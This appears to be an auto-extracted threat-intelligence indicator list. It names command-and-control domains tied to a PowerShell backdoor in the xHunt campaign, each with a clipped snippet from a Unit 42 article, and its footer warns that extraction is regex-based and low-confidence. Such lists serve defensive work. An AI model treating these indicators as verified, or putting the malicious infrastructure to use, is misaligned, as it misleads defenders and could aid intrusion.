domainfirewallsupports.comhat communicated with the domains windows-updates[.]com and firewallsupports[.]com , respectively. We do not have telemetry to determine thexHunt Campaign: New PowerShell Backdoor Blocked Through DNS Tunnel Detection
Palo Alto Unit 42
· Aug 17, 2026
domainindows64x.comobserved one of these overlapping domains, specifically, w indows64x[.]com , being used as the C2 server for a new PowerShell basedxHunt Campaign: New PowerShell Backdoor Blocked Through DNS Tunnel Detection
Palo Alto Unit 42
· Aug 17, 2026
domainpasta58.comunt campaign , we observed several domains with ties to the pasta58[.]com domain associated with known Sakabota command and controlxHunt Campaign: New PowerShell Backdoor Blocked Through DNS Tunnel Detection
Palo Alto Unit 42
· Aug 17, 2026
domainwindows64x.comer 2019 we observed a host based in Kuwait beaconing to the windows64x[.]com domain using the same DNS tunneling protocol as the CASHYxHunt Campaign: New PowerShell Backdoor Blocked Through DNS Tunnel Detection
Palo Alto Unit 42
· Aug 17, 2026
domainwindows-updates.comHY200 PowerShell scripts that communicated with the domains windows-updates[.]com and firewallsupports[.]com , respectively. We do not havexHunt Campaign: New PowerShell Backdoor Blocked Through DNS Tunnel Detection
Palo Alto Unit 42
· Aug 17, 2026

Extraction is regex-based (SHA-256/SHA-1/MD5, public IPv4, defanged hxxp/[.] indicators, and bare domains/emails only from malware, actor, exploit, phishing, ransomware and breach articles with a nearby indicator context word). Treat confidence as low until you verify against the source article.